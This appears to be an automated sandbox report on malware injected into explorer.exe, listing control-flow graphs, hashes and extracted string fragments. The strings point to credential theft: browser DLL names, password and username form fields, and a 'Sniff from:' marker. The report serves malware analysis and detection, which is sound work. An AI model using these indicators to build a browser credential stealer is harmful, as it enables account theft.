                                                                                                                                                                            control_flow_graph 421 e4d82dd-e4d8320 call e4e3942 424 e4d83fa-e4d840e 421->424 425 e4d8326 421->425 426 e4d8328-e4d8339 SleepEx 425->426 426->426 427 e4d833b-e4d8341 426->427 428 e4d834b-e4d8352 427->428 429 e4d8343-e4d8349 427->429 431 e4d8354-e4d835a 428->431 432 e4d8370-e4d8376 428->432 429->428 430 e4d835c-e4d836a call e4e2f12 429->430 430->432 431->430 431->432 434 e4d8378-e4d837e 432->434 435 e4d83b7-e4d83bd 432->435 434->435 439 e4d8380-e4d838a 434->439 436 e4d83bf-e4d83cf call e4d8e72 435->436 437 e4d83d4-e4d83db 435->437 436->437 437->426 441 e4d83e1-e4d83f5 call e4d80f2 437->441 439->435 442 e4d838c-e4d83b1 call e4d9432 439->442 441->426 442->435
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                            • Instruction ID: 9023c3f4d2c915b2b864d3ae3ab168ad9626f24677986d8bb8125ba421f164c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                            • Instruction Fuzzy Hash: CA316FB0518B49DFDB68DF6A80682AAB7A0FB58300F44467FC91DC7206C7759858CF91
                                                                                                                                                                            Function 0E4D8412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 457 e4d8412-e4d8446 call e4e3942 460 e4d8448-e4d8472 call e4e5c9e CreateThread 457->460 461 e4d8473-e4d847d 457->461
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                            • Instruction ID: 9e483fec1d6bcddf782ffe76ef8f272cf64ea22974f87ab2880f110d76dea8c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0C230268A484FD788EF2CD89563AB3D0EBA8215F444A3FA58DC3364DA29C9814756

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 0FB39D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                            • API String ID: 0-393284711
                                                                                                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                            • Instruction ID: c99efee8e7001f5b97082da32b208b3a83b5910ad1283e0574d70b5b853e4f96
                                                                                                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 36E19974618F488FCB68EF68D4847AAB7E0FB58300F504A6E959FC7252DF34A501DB89
                                                                                                                                                                            Function 0FB3C792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                            • API String ID: 0-2916316912
                                                                                                                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                            • Instruction ID: 1137253db52cd6abf9b8de0d0d942b670fcfc33074f63e1848a3de1d29eb51cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                            • Instruction Fuzzy Hash: 65B1A930618B488ECB59EF68D485AEEB7F1FF98300F50455ED49AC7252EF34A4158B82
                                                                                                                                                                            Function 0FB3A622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                            • API String ID: 0-1539916866
                                                                                                                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                            • Instruction ID: 9d254e65840263e22f404dc64e965c9a62c5f562cbb8c803064eca7a2d2da1d9
                                                                                                                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                            • Instruction Fuzzy Hash: C141B370A18B08CFDB18DF88A4856BD7BF6FB48700F40025ED489D3246DB79AD458BD6
                                                                                                                                                                            Function 0FB41AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                            • API String ID: 0-355182820
                                                                                                                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                            • Instruction ID: ba017f109d5e5a7d3036bbebb90e89335aadd7e397d927c3dd06bb7744c7b348
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                            • Instruction Fuzzy Hash: B8C18A74618B088BC758EF28E485AEAF3E1FB98304F40466E949EC7211DF34B555CB86
                                                                                                                                                                            Function 0FB41F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                            • API String ID: 0-97273177
                                                                                                                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                            • Instruction ID: df8222f217a3b9b18d9a3a383d8b6bac0a6be5561258c2f7148dcf5bf50ccb0e
                                                                                                                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                            • Instruction Fuzzy Hash: 9151E7301187488FD719DF18D5812AAB7E5FB84704F501A6EF8CBC7242DBB4A546DF82
                                                                                                                                                                            Function 0FB3B2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                            • API String ID: 0-639201278
                                                                                                                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                            • Instruction ID: ba7b1517b17584bdd89478a0f5ad3126ebc5c0571383f931ca6dcc14ae812f66
                                                                                                                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DC1B270A18B198FC758EF68E495AAAF3E1FB94300F9543A9940EC7256DF34A601CBC5
                                                                                                                                                                            Function 0FB3B2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                            • API String ID: 0-639201278
                                                                                                                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                            • Instruction ID: 3b8693c862365aa7078c7d830f1632461a2edb1bc696aef9518a363442a883e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                            • Instruction Fuzzy Hash: FFC1B270A18B198FC758EF68E455AEAF3E1FB94300F9543A9840EC7256DF34A601CBC5
                                                                                                                                                                            Function 0FB3CCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                            • API String ID: 0-2058692283
                                                                                                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                            • Instruction ID: b6ba3d51ea4690bdd8430d359a8ee36424daffb9e708162170eb22fc731717bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EA1C270A1874C8BDB19EFA8E4447EEB7E1FF88300F40466DE48AD7252DF3495558B89
                                                                                                                                                                            Function 0FB3CCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                            • API String ID: 0-2058692283
                                                                                                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                            • Instruction ID: b2be63a22babe46805ed9ea70d950aacd28e1c6fc1f70f3847c51ef1cf051e61
                                                                                                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                            • Instruction Fuzzy Hash: BE91B170A1874C8BDB19EFA8E4447EEB7E1FF88300F40466DE48AD7242EF7495558B89
                                                                                                                                                                            Function 0FB3C352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $.$e$n$v
                                                                                                                                                                            • API String ID: 0-1849617553
                                                                                                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                            • Instruction ID: 674787c54404bedaa60d4c2e1342c8744ced1fcf5da07bc1544cc3a52af792b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                            • Instruction Fuzzy Hash: B071B471A187088FD718EFA8D4847AAB7F0FF58304F00066ED44AD7262EF74E9458B81
                                                                                                                                                                            Function 0FB37C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                            • API String ID: 0-1970020201
                                                                                                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                            • Instruction ID: 6e058e64e72e3b1d2ddb7f25fb7e676c728817dd98089a70f00fbe47058e219e
                                                                                                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C516FB0918B4C8FDB54EFA8D044AEEB7F1FF58300F40462E949AE7215EF30A5419B89
                                                                                                                                                                            Function 0FB3886F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                            • API String ID: 0-1610437797
                                                                                                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                            • Instruction ID: 236915ca3ab8a81d63f30d6bcd9cffbd2e8836f1c719a0ed9e65d24e93c07aca
                                                                                                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                            • Instruction Fuzzy Hash: B5417031659B4C8BCB65EF24E8457EA73E4FB98301F44466E998EC7241EF34E5058B82
                                                                                                                                                                            Function 0FB3A4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                            • API String ID: 0-327345718
                                                                                                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                            • Instruction ID: 2c4feada67af526bc6009d448d5f28f83e45766d185814be3efa02e0cf122a3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                            • Instruction Fuzzy Hash: 15416D34A58F0DCFCB54EF68A4947ED73E5FB58300F5101AAAC4AD7242DA38E5808BC6
                                                                                                                                                                            Function 0FB38432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$el32$h$kern
                                                                                                                                                                            • API String ID: 0-4264704552
                                                                                                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                            • Instruction ID: e177c95ffcb4559d9720bb42825f6a935e5fcd2e31dfe3f3f13946e4214a7d3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F419671A08B4C4FD7A9DF28D0843AAB7D1FBA8301F544A6EA49EC3266DF70D545CB42
                                                                                                                                                                            Function 0FB3F0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Snif$f fr$om:
                                                                                                                                                                            • API String ID: 0-3434893486
                                                                                                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                            • Instruction ID: fce9011bf2558b8859190f1c1f9acd07b65be9d6abf8cb620cdd9c049191fa8d
                                                                                                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                            • Instruction Fuzzy Hash: FD31E13151CB889FD71AEB68E0846EAB7D0FB84300F50495EE49BC7252EE34A54ACF42
                                                                                                                                                                            Function 0FB3F0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $Snif$f fr$om:
                                                                                                                                                                            • API String ID: 0-3434893486
                                                                                                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                            • Instruction ID: 82df63f6180df8f8b5dae6d8a67840e327f64ed4313d96e4d4d52c7fb42a9fd7
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E312231908B48AFD719EF28E4846EAB3D4FB94300F50491EE49BC3242EE34E50ACE43
                                                                                                                                                                            Function 0FB3AFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                            • Instruction ID: 7cd84b16437ea2bfa164098d16f73fd17c034b319f154156abba731b25230ccd
                                                                                                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                            • Instruction Fuzzy Hash: 81316270618B188FC784EF68A494BAAB7E1FFD4300F9445AD984ECB256DF34D505CB92
                                                                                                                                                                            Function 0FB3AFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                            • Instruction ID: 72473f498366eb4390868adec89cefe2f7aa315280d9f71d0b819ddc273f988b
                                                                                                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                            • Instruction Fuzzy Hash: FF317270618B188FC784EF68A494BAAB7E1FFD4300F9446AD944ECB256DF34D505CB92
                                                                                                                                                                            Function 0FB3D8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction ID: 08752fd0a9d8c35916b09fa40902e3d072e6886850b3045ed3377b614ca05184
                                                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D31D131A14B0C8BCB05EFA8D8847EDB7E0FB58204F44026AD85ED7241DE789645CB89
                                                                                                                                                                            Function 0FB3D8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction ID: 0df248dae59c8779e7e5101941407c70b4bc331f21dfde7556d1c6dd65c30c7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction Fuzzy Hash: F121E430A14B0C8BCF05EFA8E8947EDBBE0FF58204F40426AD85AD7241DF789645CB89
                                                                                                                                                                            Function 0FB3EE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                            • Instruction ID: 0c602eef9648be61a358ef9eae8818bb971ff907909e16f55a95cfcab38ed01c
                                                                                                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                            • Instruction Fuzzy Hash: B4218B74A24B0D9FDB48EFA8E0447AEBAF0FF58304F50466ED409D3611DB78A5A5CB84
                                                                                                                                                                            Function 0FB3EE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
